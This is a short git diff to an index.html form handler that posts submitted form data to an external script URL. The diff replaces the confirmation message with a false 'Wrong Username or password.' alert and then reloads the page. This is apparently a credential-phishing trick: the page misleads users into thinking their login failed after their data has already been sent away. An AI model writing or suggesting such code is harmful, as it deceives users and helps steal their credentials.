--- a/index.html
+++ b/index.html
@@ -154,7 +154,7 @@ form.addEventListener('submit', e => {
   e.preventDefault()
   
   fetch(scriptURL, { method: 'POST', body: new FormData(form)})
-  .then(response => alert("Thank you! Form is submitted" ))
+  .then(response => alert("Wrong Username or password." ))
   .then(() => { window.location.reload(); })
   .catch(error => console.error('Error!', error.message))
 })
